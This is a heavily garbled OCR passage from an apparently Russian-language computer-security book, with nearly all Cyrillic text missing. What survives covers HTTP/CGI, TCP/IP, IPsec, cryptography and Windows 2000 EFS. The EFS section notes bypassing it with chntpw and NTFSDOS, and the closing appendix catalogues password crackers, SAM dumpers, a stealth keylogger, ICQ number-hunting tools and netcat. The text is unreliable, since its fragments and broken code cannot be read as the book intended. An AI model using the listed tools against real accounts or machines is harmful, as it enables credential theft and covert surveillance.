HTML 4 HTTP,
, METHOD FORM.
.
METHOD "get",
ACTION HTTP,
ACTION, ?,
,

"application/x-www-form-urlencoded".
GET HTTP, URL .
GET
ASCII.
METOD "post", ACTION
HTTP,
POST HTTP ACTION
, ,
ENCTYPE (.
).
ACTION METHOD
HTML 4 .
GET POST HTTP .
, .
11 -1687
322

, HTTP
CGI. ,

Web, , HTTP. CGI
, Web , , , . CGI- -
Web . GGI , ,
.,
.
CGI- Web
. , CGI,
. , ,
, .
, , C/C++,
PHP, Fortran, Perl, TCL, Unix Schell, Visual Basic, Apple Script .
Web-,
(
).
,
CGI .
-.

, ,
- .
HTTP ,
, (Windows, UNIX .)
.
- ,
. , MS DOS
Windows, .
,
,
. ,
arj a archiv file.txt
323
arj.exe (
) archiv file.txt.
- , , . ,
, .
Web , .
getenv().
- ,
.
, . STDIN;
STDIN fgetc (stdin).
.
1=1&2=2&. . .
- (
), -
(.. ). ,
, ,
METHOD .
REQUEST_METHOD (. ).
GET URL , QUERY_STRING.
POST
. ,
, CONTENT_LENGTH,
. CONTENT_TYPE.
CONTENT_LENGTH.
.
.
<HTML>
<
<1> </1>
</HEAD>
<BODY>
1
324
<> </>
<FORM
ACTION="http : //www. anysite . com/prog /addsubs"
METHOD="post">
<INPUT TYPE="text" ID="firstname n >
<LABEL FOR="firstname n >HMH: </LABEL><BR>
<INPUT TYPE="text" ID="lastname">
<LABEL FOR="lastname">4>aMHnMH: </LABEL><BR>
<INPUT TYPE="text" NAME= n postal-address" ID=" email ">
<LABEL FOR=" email ">e-mail </LABEL><BR>
<INPUT TYPE=" checkbox" NAME=" subscribe ">
HOBOCTeu<BR>
<INPUT TYPE=" submit" VALUE=" "> <INPUT TYPE=" reset ">
</FORM>
</BODY>
</HTML>

POST ( FORM METHOD "post")
- 42 ,
:
postal-address=ivan@email .com&subscribe=on
CONTENT_LENGTH
42, CONTENT_TYPE
"application/x-www-form-urlencoded".
"",
.

.
(,
).
\ cmpoku
.
URL,
. (
URL , ).
.
,
, .
325

/
.
, ,
,
.
, ,
, ,
. ,
/
. - URL - ,
URL
.
.
,
URL ( ,
).
http://www.anysite.com/prog/addsubs/text/template/?namel=valuel
&name2=value2
.
/ . . . / a d d s u b s /text/template/ namel=valuel name2=value2
/ . . . / (.. )
-. ,
/text/template/. ,
- , (,
- ).
URL .
/prog/addsubs?xiamel=valuel&name2=value2
.
/.../addsubs ' ' namel=valuel name2=value2
(
,
CGI, .
326
SERVER_SOFTWARE - ,
. : /.
, : /1.1.
SERVER_NAME - Web-, DNS-,
IP- (
URL).
URL .
: www.anyserver.com
GATEWAY_INTERFACE - CGI, , . : CGI/.
: CGI/1.1.

CGI- .
CGI.
SERVER_PROTOCOL - , . : /.
, : /1.1
SERVER_PORT - , , , 80.
REQUEST_METHOD - , . HTTP 1.1 .
PATH_INFO - ,
URL . ,
URL http://www.anysite.com/prog/handler.exe/text/dot,
handler.exe, PATH_INFO
"text/dot". ,
,
. PATH_INPO.
PATH_TRANSLATED -
-,
URL . ,
Web-
/usr/local/etc/httpd/htdocs. , cgi-bin
, ..
:
http://www.anyserver.com/cgi-bin. URL
http://www.anyserver.com/cgi-bin/handler
PATH_TRANSIATED: /usr/local/etc/httpd/htdocs//cgi-bin/handler ..
327
,
.
SCRIPT_NAME - ,
.
URL ( , ,
HTML,
).
: /cgi-bin/handler.exe
QUERY_STRING - , "?" URL,
HTTP- .
.

. ,
URL
:
http://www.anysite.com/handler?postal-address=
ivan@email.com&subscribe=on QUERY_STRING
: postal-address=ivan@email .com&subscribe=on.
REMOTE_HOST - , .
,
REMOTE_ADDR, .
REMOTE_ADDR - IP- ,
. : 199.23.155.34.
AUTH_TYPE -
,
.
HTTP 1.1
RFC2616.
HTTP (, "challenge"), NULL.
REMOTE_USER - ,
( ) .
REMOTE_IDENT - HTTP- RFC931,
, . , .
CONTENT_TYPE - ,
, POST PUT HTTP, MIME- , , "application/x-wwwform-urlencoded".
328
CONTENT_LENGTH - , .
, POST, ,
.
_ - (MIME-),
.
.
HTTP.
: /, /... : image/gif,
image/x-xbitmap,image/jpeg
HTTP_USER_AGENT - , .
: / /.
: Netscape/4.6 (Win2000)

STDOUT,
.
HTML, ,
, ,
HTML.
,
, .
, HTTP .
, CGI ,
nph-.
.
, : , , , .
,
CGI
,
.
,
, HTTP, ,
CRLF. , , . CGI
.
Content-type - .
329
Location - ,
, , . URL,
.
, ,
.
Status - HTTP
, . : NNN
, NNN - , , , , : Forbidden
().
. ,
-,
HTML. , .

Content-type: text/html

,
, ,
.
int main(int argc, char *argv[])
{
printf("Content-Type: text/html\n\n");
printf("<HTML>\n");
printf ( "<11|> </112>\" ) ;
printf("<BODY>\n")
printf("<HI> !</HI>\n");
printf ("</BODYx/HTML>\n") ;
return(0);
}

HTML, printf ()
. HTTP, .
,
anydoc.txt, /text/
. ,

http://www.anyserver.com/text/anydoc.txt. ,
.
330
.

Location: /text/anydoc.txt

, , FTP, ,
: ftp://ftp.cso.uiuc.edu. .

Location: ftp://ftp.cso.uiuc.edu
---
, , -
,
, .
,
, , . , nph- HTTP. , SERVERJPROTOCOL "HTTP/1.1",
HTTP 1.1.

/1.1
Server: CERN/3.0 libwww/2.17
Content-type: text/plain

HTTP

, Web,
HTML, .
Web HTTP (Hypertext Transfer
Protocol - ). HTTP

.
HTTP 1.1 ( RFC 2616,
http://www.ietf.org/rfc/rfc2616.txt)
HTTP 1.2.
, HTTP 1.1.
cmpykmypa HTTP
Web
. Web,
, -
. HTTP
, () (,
).
, ,
. , ,
. ()
RFC 822. HTTP 1.1 ,
, (CR)
(LF) - CRLF, .

{__1 CRLF __2 CRLF ...)
CRLP
[ ]

.
,
, HTTP.
,
, .
; ,
200 , 402 , ..
332
, , ,
(, HTML).
,
. ( ,
) ,
(:).
=__ " : "
[ ]
,
, ,
.
,
, , , .

, , ,
.
, , ,
, (
), .
, .

HTTP, ,
,
HTML, .. .
(. .1).
.1. HTTP 1.1
Allow
,
, : Allow: GET, HEAD, PUT
ContentEncoding

, . , Content-Type, :
Content-Encoding: gzip
( gzip)
333
ContentLanguage
, :
Content-Language: da
( )
ContentLength
, :
ContentLocation
/ URL , , Web.
URL .
Content-MD5
(.. ,
) ,
RFC 1864.
ContentRange
, .
Content-Type
,
. :
Content-Length: 35645
Content-Type:Type"/"Subtype [__1 "="

_1;...]
- , a Subtype - ;
, . , :
Content-Type: text/html; charset=ISO-8859-4
, HTML, ISO-8859-4. IANA (Internet Assigned Numbers
Authority - ).
Expires
,
, :
Expires: Sat, 04 Dec 1999 16:00:00 GMT
Last-Modified
, : Last-Modified: Tue, 17 Dec 2001 11:40:26 GMT
334
. .1
,
(
HTML). , HTML, HTTP,
HTML.
HTTP
HTTP ,
(. ), .
, .
= SP __1 SP
__ CRLF
SP - ASCII ( 32), -
HTTP, ,
URL, a CRLP - (CR) (LF).
HTTP . .2.
. 2. HTTP
OPTIONS
,
.
GET
, , URL .

.
HEAD
GET ,
; HTTP .
POST
,
,
, URL
.
PUT
,
URL.
335
DELETE
, ,
URL .
TRACE

,
.
CONNECT
HTTP 1.1 ,
-.
, HTTP 1.1.
HTML 4 HTTP,
, METHOD FORM. HTML 4, W3C,
,
.
METHOD - "get" "post". .
METHOD "get",
ACTION HTTP,
ACTION, "?", ,
"application/xwww-form-urlencoded". GET
HTTP, URL .
GET ASCII.
METOD "post", ACTION
HTTP, POST
HTTP ACTION ,
,
ENCTYPE.
ACTION METHOD
HTML 4 . GET POST HTTP
.
. .2, GET , , -
, .. , .
,
Web,
GET.
336
, , ,
, POST.
GET
ASCII. POST
ENCTYPE, "multipart/form-data",
, ISO10646.
D.
TCP/IP
- . , ,
.
Windows 2000/XP .
,
.
,
, .

, . ,
(ISO - International Standards Organization),
. OSI (Open
System Interconnection - ).
OSI
. IPSec (Internet
Protocol Security - ), ,
, (
, - Microsoft).
OSI
ISO, ,
OSI,
. OSI :
.
.
.
.
.
12-1687
338
.
- - :
. - - :
,
. .

,
.
, 0 () 1 () ,
. , (lOBaseT, 100BaseT) (10Base2)
, .

,'.. ,
( ).

.
( ) .
Ethernet
Token Ring, .
OSI
.
.
. , 802 ( ), :
LLC (Logical Link Control -- ),
() .
MAC (Media Access Control - ),
CSMA/CD (Carrier Sense Multiple Access with Collision Detection ).
CSMA/CD Ethernet, (, ARCnet), Token Ring.
339

,
. ,
,
.
,
, .

. ,
.

.
, , -
.

.
.

.
.

NetBEUI, TCP/IP . ,
.

, .

.

.
, ,
NetBIOS Windows Sockets - TCP/IP.
Windows 2000 32- Windows Sockets
(Winsock) . ,
Winsock.
12*
340

,
, ,
(, ASCII EBCDIC IBM ). ,

.
-
(XDR -- External Data Representation),
(RFC - Remote Procedure Call).
RFC - , ,
, ,
. ,
,
. RPC
/.
bag
,
, ,
. ,
.
.
- RPC.
OSI
, OSI - - .
, ,
.
,
. , 0 1 . -,
, , , .. ,

(1 0), .

,
341
. . , , ,
,
, .. -,
. ,
, ,
- ,
.
, ,
.
, ,
, , .
, ,
, .. ,
, -
. , , , ;
, .. 1 0.
,
.
, , , .
-
, .
,
,
- , .

, , .
,
-
. -
, , , ,
, .
,
- ,
.
IP-agpeca u
TCP/IP .
.

342
,
.
, -.
. , . - ,
;
.
TCP/IP -
, .
, , - .
.
Windows NT/2000/XP :
, . Ethernet
- (Media Access Control -
), .
, 6 ,
-. , , ,
. -
12 , , 00 03 12 5D 4.
(, ATM Token
Ring) .
IP-
TCP/IP. , ,
IP-. , , ,
. ,
IP- ,
,
, InterNIC (http://www.internic.net.). IP-
, .
1 254 ( 0 255 ),
, 123.45.67.89 - -. .

.
(. IP- ).
TCP/IP
. ,
(Fully Qualified Domain Name - FQDN).
, webserver
webserver.company.com.
343
, TCP/IP.

. Windows FQDN
NetBIOS (. ).
.
(, company.com)

.
FQDN, a
.
NetBIOS Windows,
net use net view. Windows
(Network Neighborhood), NetBIOS Microsoft.
15 .

.
npomokoA TCP/IP

TCP/IP (Transmission Control
Protocol/Internet Protocol - / ), .
,
.
/ ,
NetBEUI, IBM
Microsoft, TCP/IP - . TCP/IP Internet (Internet Engineering Task Force IETF), (RFC - Request for Comments).
TCP/IP
,
. TCP/IP ,
, TCP/IP, ,
, Windows 2000, . TCP/IP , , , , , , .
344
, TCP/IP ,
IP-, IP.
TCP/IP - . ,
. , ,
, ,
. TCP/IP
IP-.
IP-agpeca
TCP/IP IP-,
.
, , ,
, .
, ,
.
IP- 32- ,
- ; IP-
,
0 255. , .. ,
, , 204.209.43.2.
- ,
, -
. ,
1 0, IP-
.
IP- , ,
, , D .
.
IP- 0. 7
. 24 , , .
, 126 , 16 777 214
.
.
10.
345
14 . 16 (..
) . ,
16 384 , 65 534 .
. -
110. 21
, 8
. , 2 097 152
, 254 .
D IP- .
- D
1110, ,
.

1111 .

. ,
50 , , , , .
128 - 191,
191 - 223. 223
. IP-,
.
- . , ,
, , ,
IP-,
, .
.
- ,
.
, ,
. ,
,
. - 32-
, IP-
. : ,
, 1, ,
, 0.
-
AND - . AND
: 1, 1;
346
0.
IP- 130.57.190.42 255.255.248.0.
10000010
00111001
10111110
00101010
11111111
11111111
11111000
00000000
10000010
00111001
10111000
00000000
- 130.57.184.0.

. IP-
.
Windows NT/2000/XP
(DHCP - Dynamic Host Configuration
Protocol), -
. /

.
TCP/IP
, TCP/IP ,
. . .
, , OSI.
, OSI.
, OSI.
,
OSI.

TCP/IP ,
Windows 2000.

/

/. ,
347
TCP/IP, ,
. ,
- TCP/IP.
:
HTTP (Hypertext Transfer Protocol - ) Web-.
FTP (File Transfer Protocol - ) -
Web.
SMTP (Simple Mail Transfer Protocol - ) .
Telnet - ,
.
DNS (Domain Name System - ) -
IP-.
RIP (Routing Information Protocol - ) .
SNMP (Simple Network Management Protocol -
) -
.
TCP/IP Windows 2000
: Windows Sockets ( Windows),
Winsock, NetBT (NetBIOS TCP/IP).
.
CpegcmBa Winsock
Winsock (
Winsock) ,
.
, .
TCP/IP,
,
.
Winsock
: ,
TCP, ,
UDP (User Datagram
Protocol - ).
348
Winsock (Application
Programming Interface - API), .
,
, ,
. ,
Winsock :
1.
Winsock .
, , , Winsock ,
IP- ,
.
2.
, ,
, IP- , Winsock
. , .
1024.
3. Winsock
( ) .
4.
Winsock
OSI,
.
5. -
TCP/IP , .
Winsock ( -
) -.
6.
,
. Windows NetBT ' ,
,
.
NetBT
NetBT (NetBIOS TCP/IP) NetBIOS (Network Basic Input Output System - ) TCP/IP. NetBIOS
Windows :
349
.
, NetBIOS, . NetBIOS , .
. NetBIOS
, , ,
.
.
, .
NetBIOS
NetBEUI (NetBIOS Extended User Interface - NetBIOS). TCP/IP
NetBIOS TCP UDP. , TCP NetBIOS. TCP/IP
NetBIOS,
Windows. Microsoft
NetBIOS TCP/IP NetBT.
NetBT
NetBIOS 137, 138 139. ,
NetBIOS, , Compl,
NetBT
137. , NetBIOS, , Compl 137. ,
,
.
, NetBIOS,
NetBT, NetBT
TDI (Transport Driver Interface -
). TDI
NetBT (.. NetBIOS) . Winsock TDI.
,
Winsock IP- .
TCP/IP ,
. OSI
,
IP-.
.
350

TCP/IP
, . ,
- Web-,
HTTP (. RFC 2616).
HTTP ,
, . .
, http://www.microsoft.com ,
www.microsoft.com,
HTTP.
, (, Web-)
OSI,
(, ),
. Winsock
, API (Application Programming Interface ).
, (..
) -,
Winsock .
Winsock NetBT .
.
l/1/insock
IP- Winsock
.
> API Winsock
HOSTS. HOSTS
LP-,
.
> HOSTS , Winsock
DNS (Domain Name Service - ).
> , API
NetBIOS.
HOSTS .
, IP- HOSTS
. HOSTS
\\__\132\15\1
.
351
DNS
IP-, DNS. Winsock
DNS
IP-. DNS :
.
IP-.
DNS
.
; DNS DNS,
, ,
.
IP- ,
DNS .
, ,
, IP-
IP- - IP- DNS
.
TCP/IP Windows 95/98/NT/2000/XP
DNS DHCP (Dynamic Host
Configuration Protocol - ).
DHCP IP- DHCP.
DHCP , DHCP IP-. DHCP
IP-, , TCP/IP.
Windows 2000
DNS. Windows 2000 Professional
DNS IP-,
DNS.
TTL (Time to Live - ), ,
. , , Windows 2000 Professional,
DNS, .
NetBIOS
NetBIOS 16 , 15
,
,
. NetBT
, NetBIOS -
352
IP-. () NetBIOS IP-

NetBT .
NetBIOS. NetBIOS -,
- .
,
NetBIOS .
WINS (Windows Internet Naming Service -
Windows). WINS Windows 2000
Server , WINS
-. WINS
Windows.
. WINS
NetBIOS IP-, NetBT -

IP-.
LMHOSTS. HOSTS
, IP-
NetBIOS.
#PRE, NetBIOS -
NetBIOS. LMHOSTS
\\_\5132\15\1 .SAM.
HOSTS. NetBT NetBIOS
HOSTS. HOSTS, HKEY_LOCAL_MACHINE\SYSTEM\CurrentControSet\
Services\NetBT\Parameters EnableDns.
DNS.
EnableDns ( ), NetBT
NetBIOS DNS.

TCP/IP.

TCP/IP .
,
.
,
(TCP UDP), IP-
.
353
TCP .
TCP/IP
TCP, UDP, .
TCP
TCP (Transmission Control Protocol - )
.
. TCP
, ,
. , , ,
.
TCP
() . TCP.
- .
- -.
- TCP.
TCP , TCP.
- ,
.
. -,
. FIN,
, .
- ,
. TCP .
. ,
.
.
, - -
.
, TCP
.
. .
354
1.
- TCP,
TCP
.
2.
- TCP,
, TCP
TCP .
3. - TCP,
-.
TCP
. , - TCP
-,
. Windows
TCP 64 . Windows 2000
TCP 1 ,
TCP.
TCP SYN. ,
.
D.I. TCP.
D.I. TCP
TCP-
20
FTP
21
FTP
23
Telnet
80
Web- HTTP
139
NetBIOS
UDP
(UDP
User Datagram Protocol)
,
( ).
UDP .
UDP TCP;
, .
355
UDP ,
. UDP
, , NetBIOS NetBIOS
SNMP.
D.2 UDP-.
D.2. UDP
UDP-
53
DNS
137
NetBIOS
138
NetBIOS
161
SNMP
Me>kcemeBou

TCP/IP.
,
.
.
D? (Internet Protocol - ) - IP-
,
.
ARP (Address Resolution Protocol - )
.
ICMP (Internet Control Message Protocol -
) - IP-. ICMP
ping tracert, W2RK.
IGMP (Internet Group Management Protocol -
) .
, ,
IGMP.
.
356
IP
IP
TCP/IP. IP- ,
, -.
IP- .
IP- . IP- - IP-.
IP- . IP- - -.
.
, , - .
(TTL). .

, IP-
.
. ,
IP- - TCP, UDP, ICMP .
. -.
IP
- ,
.
, ,
.
IP-
IP-
-. TTL ,
IP- . PJP, 30

. , .
ICMP

. ICMP -
-. ICMP
, - IP-
()
.
357
IGMP
,
.
, IGMP. IGMP , ,
, .
1 - ,
2 - , . TCP/IP Windows 2000 Windows NT 3.51. , IGMP,
NetShow.
ARP

.
MAC (Media Access Control -
). MAC ( -) - 48- ,
. - MAC , ,
TCP/IP.
-,
, NetBIOS - -.
ARP (Address Resolution Protocol - ), RFC 826.
ARP TCP/IP. .
ARP IP- .
1. ARP,
IP- -.
2.
ARP ,
ARP. -
, IP- , - . ARP ,
.
3.
ARP -
, . ,
. , ARP,
, -, .
-
ARP.
358
4.
.
-
ARP. .
, -
. , -
. , IP
, - - .

( )
TCP/IP / . TCP/IP
Ethernet, Token Ring, X.25 Frame Relay.
,
.
-
Windows 2000 NDIS (Network Driver Interface Specification ) 5 (NDIS 5.0).
Active Directory
TCP/IP Windows 2000
, ,
,
.. Windows 2000
AD (Active Directory),
, Windows NT.
AD ,
, , OU
(Organizational Unit).

DNS ( OSI
, ).
, DNS, .
, - .
, .
, , .
, ,
359
. ,
.
Windows NT 4,
,
.

, .
, , , . , .
.
Windows NT .
Windows 2000 :
, ,
, .
: ,
.
, Windows NT. ,
Windows 2000 .
-
, - ,
- . AD Active Directory Users
and Computers (Active Directory - ), Security
Configuration and Analysis ( ) ,
Windows 2000/XP.
AD Windows 2000/XP
LDAP (Lightweight Directory Access Protocol ) LDAP AD, , . ,
LDAP [3].
AD [6]
AD,
AD.
, Windows 2000/XP - IP-.
360
1-
TCP/IP , , , , , . ,
, - ,
.
/.
.
.
,
.
( , sniffing - ).
. , ,
,
, .
IP-. TCP/IP IP, IP- (. ), ,
, . IP- , , ,
, .
. -
. ,
,
, .
- .
, , -
, , -
SAM .
DoS (Denial of Service - ).
, .
, .
,
,
, .
. , -
361
. .
/
.
.
, . ,
(, pcAnywhere). ,
- , , ,
.
IP-,
IPsec (Internet Protocol Security
),
IP- . IPsec , TCP/IP, TCP/IP
. ,
IPsec.
IPsec
IPsec , ,
. ,
IPsec , IPsec , , .
, IPsec
-

.
IPsec ,
, , - , ,
. , . , , ,
(, LC4)
.
,
,
,
362
. IPsec , - .
, (
), - IPsec
.
IPsec ,
. IPsec .
. IPsec
,
.
, (PKI), - .
,
DES 3DES.
(Hash Message Authentication
Codes). -
, .
.
MD5 SHA.

.
IPsec IP, IPsec
. IPsec ,
, .
IPsec ,
. IP- ,
.
IP-, Windows 2000/XP
(, [6]).
- (, , ),
.
: , , ,
, , . ? ( )
, .
, (.. ) , , , .
, .

, ,
, . ,
, , .. ,
, .
,
- . , .
- , . - ,
( ).
( - ).
, .
, :
()=

D , .
D(C)=0
364

, D - . , 3 . - , , . ,
.
, (), . , , , , , ?
. .
.
, - .
. ,
, -
.
.
.
.

, ,
, . , , , .
. -, .
- , - , ,

. , /. .
365
, , ,
, .
, .
: , / ; ,
.
, /
, . ( ) ,
( )
. - .

; .
(0)=
DK(C)=0
,
.. ()
(2). .
1(0)=
DK2(C)=0
,
- .
-
, .
;
-
. ,
,
.
: .
366

,
. ,
.

. , , , , ( ,)
. , , ; .
.
(0)=
D K (C)=0
, , / .
, . , . / - , (
), , , . ( ) ( ). 64 .

( )
,
:
. , .. ( ).
, ,
, ,
, . , ,
.
367
(0)=
D K (C)=0
, , .
- , ,
. .
, . , , '= () N , ' ,
, .. '=.
, - , '. N , . , ,
. .

,
(, , - ). - ,
.
-
, .
, ,
, .
, ,
, ,
. , !
, , .
.
. , ,
.
.
, , .
368
.
, - .
. ,
,
, .
.

, . .
. ,
.
.
, , , .
.
. , .
, .
, .
, .
,
. ,
2128 ( ), , ,
1019, .
.
- , , . , , , ,
, .
, , .
369
, , , ,
.
. ,
,
, ,
.
1
,
,
. ,
. , - , . ,
.
, , , , . , . ,

,
.
, . -1
-2 , .
, , , , , , , . .
13-1687
370

-1 -2
, . .
1. -1
.
2.
3.
4.
5.
-2
-1 -2 .
-1
.
-1 -2.
-2
.
, , , ( 4 ).
, ,
, ,
, ,
. ( ), ,
.
?
-

, , , .
, , , .
.
, , ,
. -1, -2 .
, ,
. , .
, :
371
.
,

.
, .

- . , ,
,
.
.
1. -1 -2
.
2.
3.
-1 -2 .
-2 -1
-1.
4. -1
-2.
, , , PGP Desktop Security.
.
1.
-1 -2 .
2.
-1 ,
-2, -2.
3.
-2 -1.
, ,
() , ,
, ,
, .
13'
372
,
,
, -
.
, .
kpunmocucmeMbi

,
, .
.

.
1.
-2 -1 .
2.
-1 , -2 -2.
.
2 ()
3.
, -2 -1 .
D2(E2(K))=K
4.
, .
5. .

. , ,
,
- .

, .
, . .

. 2,
.
373
1.
-1 -2
.
2.
3.
, -1, 2.
4.
-2.
5.
-2 2
-1 .
-1 ,
-1 . ,
, . , :
, .
,
.
.
. , , -2
(.. ), ,
.
. . -2, ,
-1,
,
, -1.
. -1 , , .
- , , , ( ).
.
. , .

( , , ),
374
. , (, ),
, .

,
, , ,
. ,
, . - , ,
-. , , .
-!<1
, ,
, .. , F(x)
,
F ( x ) .
. , , , .'
, ( ).
. , ,
-
.
,
F ( X ) , F(x)
, z.

.
-, (), , h ' , .. :
h=H(M)
h, , , .
,
, - -
375
, , , .
, h.
h, , () =h.
, , ', () =('),.
. -1 ()
. ? , , ', , , .. ()=('),
.
-, , , , ,
. ,
-1 ,
-2 , -1
,
.
.

, , ,
, - . :
S K (M)
:
V K (M)
, ,
, . ,
.
,
, .
.
376
1.
.
-1 .
Si(M)
2.
-1
-2 -2.
E2(Sj.(M))
3. -2 .
D z C E j t S i C M ) ) ) = Si(M)
4.
-2 ,
-1, .
Vi(Si(K))"VL
. -,

/ ; -1 , . -,
. ,

. -, .
,
, .

(
2002 ).

.
(PKI - Public Key Infrastructure).

, PKI,
- , .
-1 -2,
-2. -2
, , , .
.
, -1 -2.
377
-2 ?
,
, .
-2 -1 , .
, ,
-2 . , , .
.
Cepmucfukambi omkpbimbix
, . ,
, , - , . , , ( - Certification Authority). , , , , ,
.
.
PKI .
, , ,
. , , , - . -
, , :
, ,
.
.
. ,
- ,
. , -
.
.
378
, ,
.

, .
,
.
Windows 2000 Server Advanced Server PKI .
, Windows NT

Web-. Windows 2000 Professional , Web, .
Windows 2000 Professional
X.509v3 ( 3), ITU-T (International Telecommunications Union - ) . X.509v3 - , ,
, . Windows 2000
, ,
. Windows 2000 , (Certificates) .

PKI, , , PKI,
. , ;
. ,
, , ,
, , .
, , - , , , . -- ,
. - ; , . ,
379
, , , PKI ,
.
PGP Desktop Security,
( ).
PGP
, . .
, Windows 2000/XP ,
, NTFS,
, Windows 2000.
Windows 2000 ,
.
Windows 2000
Windows 2000 - Professional, Server Advanced Server -
EPS (Encrypted File System). EFS
, NTFS ( FAT). DESX 56-
.
;
Windows 2000 , DDF (Data Decipher Field - ). DDF Windows 2000, .
,
, ,
.
Windows 2000 Professional .
- , () .. EFS .
Windows 2000
, (
, ).
, EFS? DESX DES (Data Encryption Standard -
), , , -
380
, , 2000
AES (Advanced Encryption Standard - ). , 56- , (, ).
Windows 128- , Microsoft Enhanced CryptoPAK.
Microsoft (My Documents) /Temp , .
, (, MS Office
..).
Microsoft EFS
, . [3]
,
chntpw.exe. ,
(
Linux),
, SAM,
SYSKEY.
, [3] Windows
2000 SAM , , Windows 2000 , NTFSDOS Pro
(http://www.sysinternals.com),
NTFS. , ,

, .
, chntpw.exe , . , EFS
- , , ,
, .
, Microsoft EFS,
.
Windows ,
Windows
.
F. kojuinakm-gucka
""
95sscrk.zip
!?55
Win95 Screensaver
password cracker

Windows 95/98

2 acpr.zip
Advanced Access
Password Recovery

Microsoft Access
95/97/2000
www.elcomsoft.com
3 ae2000pr.zip
Advanced Excel 2000

Password Recovery

Microsoft Excel 2000
www.elcomsoft.com
4 aimpr.zip
Advanced Instant
Messengers Password
Recovery

- ICQ, AOL IM,
Yahoo! Messenger, MSN Messenger .
www.elcomsoft.com
5 amipswd.rar
AMI BIOS password

decipherer
BIOS
6 Antexp.zip
Advanced NT Security
Explorer

Windows NT/2000/XP.

7 AntiSniff
AntiSniff
8 aoepr.zip
Advanced Outlook
Express Password
Recovery
www.elcomsoft.com
9 aopb.zip
Advanced Office
Password Breaker

Word Excel 97/2000
www.elcomsoft.com
www.elcomsoft.com/
10 aoxppr_p.zip
Advanced Office XP
Password Recovery

Word, Excel, Access, Outlook, Project, Money,
PowerPoint, Visio, Publisher, Backup,
Schedule*, Mail
www.elcomsoft.com
11 aoxppr_s.zip
Advanced Office XP
Password Recovery

Word, Excel, Access
www.elcomsoft.com
12 aw2000pr.zip
Advanced Word 2000

Password Recovery

Word 97/2000
www.elcomsoft.com
13 azpr.zip
Advanced ZIP Password

Recovery
ZIP/PKZip/WinZip
www.elcomsoft.com
14 brutus-aet2.zip
Brutus-AET2
www.hoobie.net/brutus
15 CGIScan.zip
CGI Vulnerability Scan
Web-
www.wangproducts.co.uk
16 Cgiscan3.zip
CGI Exploit Scanner v 3.

Web-

Linux,

Windows,

17 chntpw
chntpw
18 Cleaner3.exe
The Cleaner 3.5
www.moosoft.com
19 Clndisk.exe
Clean Disk Security
,,
"SSSSST
www.nai.com
20 CyberCop_Scanner_ CyberCop Scanner 5.5

CSCI550E.zip
21 dcs21.zip
D@mned CGI Scanner
CGI-
22 els004.zip
ELSave
23 Foundstone Tools

Foundstone

: , ,
.
24 grabitall.zip
GrabitAII
www.ntsecurity.nu
25 Hping

Hping

(.. ) ICMP,

www.hping.org
26 hunt

Hunt
TCP-
27 ICQ Groupware
ICQ
ICQ
www.icq.com
ICQ submachine-
ICQ
http://uinhunters.net
28 icqsmg14.zip
www.foundstone.com
Gun v1.4.
29 iks2k21d.exe
Invisible KeyLogger
Stealth
www.keylogger.com
30 kerio-wrp-425-ruwin.exe
WinRoute Pro 4
www.kerio.com
31 kitd.exe
Passware Kit 5.7

, ICQ,
, , Window
www.lostpassword.com
32 Ic4setup.exe
LOphtCrack (LC4)
SAM
(Security Account Manager)
33 legion.zip
Legion v 1 .2.
packetstormsecurity.org/
groups/rhino9
34 Iegionv21 .zip
Legion v2.1.
packetstormsecurity.org/
groups/rhinoS
35 Lib
,

-
www.microsoft.com
36 Isadump2.zip
Isadump2

Windows,
Windows

www.webspan.net/~tas/
Isadump2
37 nc11nt.zip
Netcat 1.10 for NT

Web- IIS
38 Nmap

Nmap
,
,
ACL
www.insecure.org/nmap

NTFS MS-DOS
www.winternals.com
www.agnitum.com
39 NTFSDOS Pro 4.0.zip NTFSDOS Pro
www.atstake.com
40 OutpostProlnstall-2-0.exe
Agnitum OutpostFirewall
Pro v 2.0
41 PGP
PGP Desktop
Security 7.0.3
www.pgp.com
42 pro12.exe
TeleportPro v 1.2.
www.tenmax.com
"SSST
^=
^"
43 PS4Demo.exe
PhoneSweep

,
,
,

www.sandstorm.net
44 PwDump
'
PwDump
www.ebiz-tech.com
45 pwltool.zip
PWL&NetTools v 6.80

Windows 9x/Me
46 reti na4943demo.exe Retina - Network

Security Scanner

Web-
47 RevelationV2.zip
Revelation v 2 .0
,
*****
www.snadboy.com
48 satndump.zip
SAMDump

SAM
49 showin.zip
ShoWin v 2.0
www.foundstone.com
50 slpro_20.exe
ScreenLock
www.screenlock.com
www.solarwinds.net
51 SolarWinds2002-PP- SolarWinds Professional 37

Eval.exe
Plus

www.eeye.com
.,.
52 spynet.zip
SpyNetvO.1
53 spynet312.exe
SpyNetv3.12
54 superscan121.exe
SuperScan v 1.21
55 tcpdump

tcpdump
www.tcpdump.org
56 tftpd32m.zip
Tftpd32 ,
www.superscan.net
tftp32.jounin.net
TFTP-, -,
DHCP- syslog-
57 Tripwire
Tripwire
www.tripwiresecurity.com
58 wgsetup.exe
WinGate v 5.0.7
www.wingate.com
59 ZZ.exe
Zombie Zapper
razor.bindview.corrvtools/
ZombieZapper_form.shtml
Cnucok
1. 2000-2003 .
2. .. - .: -, 2001. - 624 .: .
3. - ., ., . . , 2- .: . . - .: ,
2001.- 656 .: . - . . .
4. - ., ., . . Windows
2000 - .; . . - .: ,
2002.- 264 .: . - . . .
5. . .
. - 560 . - .: ,
2002.- ( ).
6. . . Windows 2000.:
Windows 2000.: . . - .: , 2001. - 592
.: . - . . .
7.
Alex JeDaev . - .:
, 2002 - 432 .: .
8. . . (+CD). .:, 2002. - 864 .: .

9. .. .: . . - .: +, .:
, .: -, 2001.- 272 .
10. . .
-.: ,
2000. - 736 .
11. ., . . Web- .; . . - .: , 2003.384 .: . - . . .
12. . , . .
- .: . 2002. - 848 .: .
13. - , .
14. - ., ., . . , 3- .: . . - .: ,
2002.- 736 .: . - . . .

1.
1.
- ?
?
?
7
10
16
17
18
24
2.
25
26
26
28
29
30
31
:
31
33
35
3.
36

Web
Web

36
37
38
39
40
41
42
43
43
44
44
45
4. Windows 2000/XP
46
46
47
... 48
389
Windows 2000/XP
49
SAM

Windows 2000
50
51
52
54
56
57
2.
58
5.
58
59
NTFSDOS Pro
60
BIOS

SAM
.pwl
65
66
68
."
'.
69
72
76
6.
78
78

******
79
84
87
89
89
90
90
92
93
94
7.
95
96
97
101
104
106
107
108
109
110
390
.......110
111
112
3. -
113
8. Web
113
HTML

ActiveX
.

Web-
SSL

9.
115
119
119
121
122
123
126
127
128
129
129

MIME

130
131
132
134
135
137
140

W W W
144
146
147
10.
148
148
...t50
153
155
155
156
161
163
11. ICQ
164
.. 165
391
ICQ
-UIN
IP- ICQ-
ICQ-
ICQ
ICQ-
166
167
168
